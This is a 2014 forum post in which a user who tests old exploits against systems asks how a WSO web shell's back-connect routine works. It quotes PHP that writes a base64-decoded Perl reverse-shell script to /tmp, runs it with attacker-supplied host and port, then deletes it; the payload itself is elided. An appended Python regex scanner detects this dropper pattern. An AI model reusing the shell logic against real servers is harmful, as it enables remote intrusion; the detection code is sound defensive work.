Elohim, posted February 18, 2014 (edited)

I spent the whole day going over some small/old exploits, testing different things from different angles, and I ran into the back-connect problem. Those old, old scripts come in N variants in N languages. Well, I came to the conclusion that the code the WSO shell uses adapts best, with a rate of 28 out of 35 runs on different systems. Of course, I upload them the hard way, upload / wget, however I manage, but looking at the source of a WSO shell, and working with that PHP RCE exploit, I noticed the following approach:

    $back_connect_p = "<base64-encoded Perl script, elided>";

That is Perl code, base64-encoded, no doubt about it. Then we have this:

    cf("/tmp/bc.pl", $back_connect_p);
    $out = wsoEx("perl /tmp/bc.pl " . $_POST['p2'] . " " . $_POST['p3'] . " 1>/dev/null 2>&1 &");
    sleep(1);
    echo "<pre class=ml1>$out\n" . wsoEx("ps aux | grep bc.pl") . "</pre>";
    unlink("/tmp/bc.pl");

It's clear that unlink deletes the file, and that echo looks through the processes to see whether it ran, i.e. shows me the pid. What I don't understand is this part:

    cf("/tmp/bc.pl", $back_connect_p);

I'm not afraid of the search function, nor of Google, and after countless searches I couldn't find anything about that function, absolutely nothing. Can someone explain to me in a few words how the "magic" happens?

Thanks.

L.E. (later edit): Sorry, it's late and it seems I can't see properly anymore. It was defined right above:

    function cf($f, $t) {
        // "=" binds tighter than "or", so $w receives the fopen() handle;
        // the function_exists() branch is never used as a fallback
        $w = @fopen($f, "w") or @function_exists('file_put_contents');
        if ($w) {
            // decode the base64 payload and write it to the target file
            @fwrite($w, @base64_decode($t));
            @fclose($w);
        }
    }

Edited February 18, 2014 by Elohim: stupid me
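The dropper pattern in the post (base64-decode into /tmp, run it in the background with request-supplied arguments, unlink the file) is a useful detection signature. The following is an added example, not code from the post or from WSO: a small Python scanner that flags PHP source containing several of those indicators at once; the sample fragments are constructed for the test, with the base64 payload replaced by a placeholder.

```python
import re

# Constructed sample: the WSO-style fragment quoted in the post (payload elided).
WSO_SAMPLE = r'''
function cf($f,$t) { $w = @fopen($f,"w") or @function_exists('file_put_contents'); if($w){ @fwrite($w,@base64_decode($t)); @fclose($w); } }
cf("/tmp/bc.pl",$back_connect_p);
$out = wsoEx("perl /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." 1>/dev/null 2>&1 &");
unlink("/tmp/bc.pl");
'''

# Constructed benign sample: base64 in a request is common (e.g. uploaded images),
# so one indicator alone must not trigger.
BENIGN_SAMPLE = r'''
$img = base64_decode($_POST['avatar']);
file_put_contents("/var/www/uploads/avatar.png", $img);
'''

# Each indicator is one step of the dropper chain described in the post.
INDICATORS = {
    # decoded payload written straight to a file handle
    "b64_to_file": re.compile(r'fwrite\s*\([^,]+,\s*@?base64_decode\s*\(', re.I),
    # interpreter launched on a script under /tmp
    "tmp_script_exec": re.compile(r'\b(perl|python|sh|bash)\s+/tmp/\S+', re.I),
    # request parameters spliced into the command line
    "post_in_command": re.compile(r'\$_(POST|GET|REQUEST)\s*\[[^\]]+\]', re.I),
    # output discarded and process backgrounded
    "bg_nullout": re.compile(r'1>\s*/dev/null\s+2>&1\s*&'),
    # dropped file removed after launch
    "unlink_tmp": re.compile(r'unlink\s*\(\s*["\']/tmp/', re.I),
}


def scan_php(src: str) -> list[str]:
    """Return the names of all indicators present in the PHP source, in table order."""
    return [name for name, rx in INDICATORS.items() if rx.search(src)]


def is_suspicious(src: str, threshold: int = 3) -> bool:
    """Flag a file only when several links of the chain co-occur, to limit false positives."""
    return len(scan_php(src)) >= threshold


if __name__ == "__main__":
    for label, sample in (("wso", WSO_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(label, scan_php(sample), is_suspicious(sample))
```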